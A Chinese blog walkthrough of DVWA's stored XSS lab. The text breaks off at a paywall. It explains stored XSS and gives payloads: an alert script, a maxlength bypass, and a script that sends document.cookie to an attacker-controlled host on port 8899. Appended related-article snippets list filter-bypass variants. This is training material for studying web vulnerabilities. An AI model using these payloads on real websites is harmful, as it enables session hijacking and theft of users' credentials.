DVWA通关--存储型XSS(XSS (Stored))

最新推荐文章于 2025-09-28 16:41:42 发布
原创 最新推荐文章于 2025-09-28 16:41:42 发布 · 9k 阅读 · 36 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#javascript #网络安全 #xss #html #php

本文深入探讨了存储型XSS的概念、攻击路径和危害,并通过不同难度等级的实例展示了如何利用和防御此类攻击。从LOW到IMPOSSIBLE,逐步解析了payload的构造和源码分析,揭示了XSS过滤机制的漏洞和防范措施。

目录

LOW 

通关步骤

源码分析

MEDIUM

通关步骤

源码分析

HIGH

通关步骤

源码分析

IMPOSSIBLE

源码分析

存储型XSS也叫持久型XSS,从名字就知道特征是攻击代码会被存储在数据库等存储介质中,因此功效持久。攻击者可以把payload放在网站留言板、评论等位置,待用户访问网站并有匹配payload的行为时,即可触发攻击。

存储型XSS和反射型XSS本质都是一样的,只不过反射型XSS的payload的行动路径是:受害者浏览器--服务器--受害者浏览器,而存储型XSS的payload的行动路径是:浏览器--服务器--存储介质--服务器--受害者浏览器。

相关推荐:

DVWA通关--反射型XSS(XSS (Reflected))_箭雨镜屋-优快云博客

pikachu XSS Cross-Site Scripting(皮卡丘漏洞平台通关系列)_箭雨镜屋-优快云博客

WebGoat (A7) Cross Site Scripting (XSS)_箭雨镜屋-优快云博客

LOW 

通关步骤

1、试一下最简单的payload:<script>alert(1)</script>

这里我是写在message输入框里面的,name输入框是限制长度的,其实这个长度限制如果仅仅是在html中控制,是可以突破的。

等到第二步的时候来突破一下。

成功弹框

2、尝试突破一下name输入框长度限制

可以在name输入框右键->查看元素(chrome浏览器里面是右键->检查),或者F12打开之后在elements里面自己找找。

可以看到name输入框maxlength是10

直接把maxlength的值改成100

这样就可以绕开输入框长度的html标签属性限制,把payload完整输入进去了

弹出弹框

3、尝试一下获取cookie:

payload:<script>document.write('<img src="http://ip:8899/'+document.cookie+'"/>')</script>

payload里面的ip换成自己的攻击机ip地址,这个ip地址必须是目标机可达的ip地址,并且攻击机上需要起http协议。

简单地起http协议的方法有两种:

(1)用python2:

p

最低0.47元/天 解锁文章
DVWA靶场——XSS(Stored)
sucker的博客
12-02 2782
标签和alert关键字的机制。2,使用最简单的XSS漏洞测试语句进行测试,但是要先判断存在漏洞的注入点,payload:<script>alert('XSS')
DVWAXSSstored存储XSS
RexHa的博客
10-08 2540
dvwa 存储XSS
DVWA-XSS (Stored)-存储XSS
seanyang_的博客
06-12 3091
跨站点脚本 (XSS)”攻击是一种注入问题,其中恶意脚本被注入到原本良性和受信任的网站上。当攻击者使用 Web 应用程序发送恶意代码(通常以浏览器端脚本的形式)时,就会发生 XSS 攻击, 给其他最终用户。允许这些攻击成功的缺陷非常普遍,并且发生在使用输出中用户输入的Web应用程序的任何地方, 无需验证或编码。攻击者可以使用 XSS 向毫无戒心的用户发送恶意脚本。最终用户的浏览器无法知道脚本不应该被信任, 并将执行 JavaScript
XSS(跨站脚本攻击)详解【场景、影响、检测、防护】
最新发布
NeoLshu的博客
09-28 1405
本文全面解析了XSS(跨站脚本攻击)的原理、分类、示例及防护策略。XSS攻击通过注入恶意脚本,利用浏览器信任执行窃取凭证、篡改页面等操作。分为反射存储和DOM三种类,攻击后果严重,可导致会话劫持、数据泄露等风险。文章提供了易受攻击的代码示例及修复方案,强调根据不同输出上下文进行编码(如HTMLJavaScript转义),并推荐使用白名单过滤和安全的DOM操作API(如textContent)。检测方法包括手工测试、黑盒扫描和代码审计。防护核心在于输入验证、输出编码和严格的内容安全策略(CSP)。
存储XSS
m0_51313985的博客
05-25 6819
持久/存储XSS:嵌入到web页面的恶意HTML会被存储到应用服务器端,简而言之就是会被存储到数据库,等用户在打开页面时,会继续执行恶意代码,能够持续的攻击用户; 前面的文章讲到了XSS,但是不清楚弹窗有什么用,在此强调下,弹窗只是证明那个地方存在xss,就和SQL注入单引号报错或者and 1=1;and 1=2一样 xss =>跨站脚本攻击=>前端代码注入=>用户输入的数据会被当做前端代码执行。 存储:用户输入的数据会被存入数据库,然后页面输出时会被当做前端代码执行。 如果用户输入
存储 XSS
weixin_33777877的博客
10-09 384
存储XSSXSS***的用处JS-Context存储XSS:1、&lt;/script&gt;闭合当前脚本,然后输入自定义内容。过滤&lt;,&gt;,/替换&lt;/script&gt;为&lt;/’+’script&gt;(网易邮箱)2、根据JS上下文,构造正确的闭合。根据实际情况,进行过滤。通常输出是字符串,在’和"之间,过滤’,"即可和&lt;script&gt;中的XSS一样,过滤’...
DVWA-XSS (Stored)
qq_45751902的博客
04-25 3294
目录简介安全级别:Low安全级别:Medium安全级别:High安全级别:Impossible 简介 存储XSS 长期存储于服务器端; 每次用户访问都会执行脚本代码; 安全级别:Low 查看源码 <?php if( isset( $_POST[ 'btnSign' ] ) ) { // Get input $message = trim( $_POST[ 'mtxMessage' ] ); $name = trim( $_POST[ 'txtName' ] );
DVWA系列之21 存储XSS分析与利用
weixin_33857679的博客
12-30 227
存储跨站可以将XSS语句直接写入到数据库中,因而相比反射跨站的利用价值要更大。在DVWA中选择XSS stored,这里提供了一个类留言本的页面。我们首先查看low级别的代码,这里提供了$message和$name两个变量,分别用于接收用户在Message和Name框中所提交的数据。对这两个变量都通过mysql_real_escape_string()函数进行了过滤,但是这只能阻止SQL注入...
DVWA--- 十、存储XSS(XSS Stored)
qq_43168364的博客
05-31 685
XSS Stored 目录 一、low级别 二、Medium级别 三、High级别 四、Impossible级别 五、预防方法 一、low级别 不多说直接尝试写入 弹窗成功 由于他是存储的只要我们点击该模块就会引发弹窗,可以看到我们的JS代码是写入了数据库的,只要不清除他就会一直存在. 代码审计 相关函数 trim(string,charlist)函数: 移除字符串两侧的空白字符或其他预定义字符。string—必需, 规定要检查的字符串。charlist—可选, 规定从字符串中删除哪些字符
DVWA--XSS(Stored)(存储XSS)(全难度)
wwxxee
03-03 446
DVWAXSS(Stored)(存储XSS) 原理参考:网络安全笔记-99-渗透-XSS 逻辑 输入姓名与留言,可以在下方显示。 难度分级 Low 核心代码 <?php if( isset( $_POST[ 'btnSign' ] ) ) { // Get input $message = trim( $_POST[ 'mtxMessage' ] ); $name = trim( $_POST[ 'txtName' ] ); // Sanitize m
DVWA攻略-05-XSS-DOM/反射/存储
Xor0ne
07-16 999
参考文献: DVWA靶场-XSS(DOM、反射存储) 文章目录9.DOM-xss9.1、low9.2、medium9.3、high9.4、impossible10.Reflected XSS10.1、low10.2、medium10.3、high10.4、impossible11.Stored-xss11.1、low11.2、medium11.3、 high11.4、impossible 9.DOM-xss DOM,文档对象模(Document Object Model),是W3C组织推荐的处
DVWA-XSS(Stored)
weixin_44866139的博客
02-01 713
Low 直接输入 1、查看服务器端源代码 <?php if( isset( $_POST[ 'btnSign' ] ) ) { // Get input $message = trim( $_POST[ 'mtxMessage' ] ); $name = trim( $_POST[ 'txtName' ] ); // Sanitize message...
dvwa详解_DVWA--XSS(stored)
weixin_33478575的博客
12-24 1080
XSS0X011、简介跨站脚本(cross site script)为了避免与样式css混淆,所以简称为XSSXSS是一种经常出现在web应用中的计算机安全漏洞,也是web中最主流的攻击方式。那么什么是XSS呢?XSS是指恶意攻击者利用网站没有对用户提交数据进行转义处理或者过滤不足的缺点,进而添加一些代码,嵌入到web页面中去。使别的用户访问都会执行相应的嵌入代码。从而盗取用户资料、利用用户身份...
Dvwa存储XSS攻击全级别学习笔记
Mbys_Lettuce的博客
09-19 2241
和好像被过滤掉了,会不会像反射一样,只是过滤了,只要复写或者大小写可以攻击了呢?把写入内容修改成alert(document.cookie)或者alert(document.cookie)
DVWA--存储XSS(初中高)
firecjh的博客
06-09 1145
选择“View Source”查看源程序,发现服务器端对message框内容使用了htmlspecialchars() 函数进行转义,对name框使用str_replace()函数进行替换。选择“View Source”查看源程序,对message参数进行html转义外,还对name参数使用preg_replace()函数进行替换,不能使用常用的绕过方法。2)在界面出现弹框,弹框内容为本人姓名拼音。2)在界面出现弹框,弹框内容为本人姓名拼音。3) 刷新页面,查看是否再次出现弹框,比较与反射XSS的区别。
xss存储
xu_1234567的博客
11-04 4997
1.存储xss原理 存储xss是hacker向服务器注入一段js代码,代码存储到服务器的数据库中,每当用户访问服务器当中带有js代码的数据时,服务器将响应用户,返回给用户一个带有js代码页面 2.xss存储low级演示 1.将DVWA级别设置为低级 分析源码,可以看到首先对两个参数使用trim函数过滤掉两边的空格,然后$message使用mysql_real_escape_string函数转义SQL语句中的特殊字符,使用stripslashes函数过滤掉”\”,对$name参数中使用mysql_re
DVWAStored XSS(存储XSS)
热门推荐
谢公子的博客
10-04 1万+
目录 Low Medium High Impossible Low 源代码: &lt;?php if( isset( $_POST[ 'btnSign' ] ) ) { // Get input $message = trim( $_POST[ 'mtxMessage' ] ); $name = trim( $_POST[ 'txtName' ] );...
存储xss
weixin_42576186的博客
12-26 470
存储XSS(Cross-Site Scripting)是一种常见的Web安全漏洞,它指的是攻击者往Web应用程序中注入恶意代码,被存储在服务器端,当其他用户浏览这些页面时,嵌入的恶意代码就会被执行。 存储XSS攻击通常发生在用户留言板、论坛和博客等功能中,攻击者可以在留言板中发布带有恶意代码的留言,当其他用户浏览留言板时就会受到攻击。存储XSS攻击也可能发生在用户提交表单时,如果Web应用程...
dvwa xss过滤绕过存储
06-14
### 存储XSS绕过技巧分析 存储XSSStored XSS)是一种持久化的跨站脚本攻击,攻击者通过提交恶意代码到服务器端,这些代码被保存在数据库中,并在其他用户访问时被执行。DVWA(Damn Vulnerable Web Application)是一个用于学习和实践Web安全漏洞的工具,在不同安全级别下对输入参数进行了不同程度的过滤。 以下是对DVWA存储XSS过滤绕过的分析和解决方案: #### 1. 输入点 `message` 的过滤与绕过 根据描述,`message` 参数经过了严格的过滤处理[^3]: - 使用 `strip_tags()` 函数删除 HTML 标签。 - 使用 `htmlspecialchars()` 将预定义字符转换为 HTML 实体。 - 使用 `addslashes()` 在双引号前添加反斜杠。 - 使用 `mysqli_real_escape_string()` 防止 SQL 注入。 由于这些措施的存在,直接插入 JavaScript 脚本或 HTML 标签将无法生效。然而,可以尝试以下方法绕过: - **利用事件属性**:即使标签被剥离,事件属性如 `onerror` 或 `onload` 可能未被完全过滤。例如: ```html <img src=x onerror=alert(/xss/)> ``` - **使用 Unicode 编码**:某些过滤器可能未对编码字符进行检测,可以通过 Unicode 编码绕过。例如: ```html <script>alert(/xss/)</script> ``` #### 2. 输入点 `name` 的过滤与绕过 `name` 参数的过滤相对较少[^2]: - 删除空格。 - 替换 `<script>` 标签为空字符串。 - 未对大小写敏感。 因此,可以通过大小写变形绕过过滤器。例如: ```html <ScRiPt>alert(/xss/)</ScRiPt> ``` 此外,还可以尝试以下方法: - **使用内联事件**:某些过滤器可能未对事件属性进行严格检查。例如: ```html <a href="#" onclick="alert(/xss/);">Click Me</a> ``` - **利用注释混淆**:通过插入 HTML 注释干扰过滤器。例如: ```html <!-- -><script>alert(/xss/)</script><!-- - --> ``` #### 3. 绕过 Anti-CSRF Token 的限制 在高安全级别下,DVWA 引入了 Anti-CSRF Token 来防止 CSRF 攻击[^1]。这使得传统的 XSS 攻击难以通过 CSRF 请求触发。但可以通过以下方式绕过: - **本地测试**:如果目标系统允许 CORS 或存在其他漏洞,可以通过本地测试环境构造请求。 - **结合其他漏洞**:寻找系统中其他潜在漏洞(如路径遍历、文件上传等),并结合使用。 #### 示例代码 以下是一个简单的存储 XSS 攻击示例,适用于低安全级别的 DVWA 环境: ```html <!-- 使用大小写变形绕过过滤 --> <ScRiPt>alert('XSS')</ScRiPt> <!-- 使用事件属性绕过过滤 --> <img src=x onerror=alert('XSS')> <!-- 使用 Unicode 编码绕过过滤 --> <script>alert('XSS')</script> ``` ### 注意事项 尽管上述方法可用于学习和研究,但在实际环境中实施此类攻击是非法且不道德的行为。请仅在授权的情况下进行测试。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值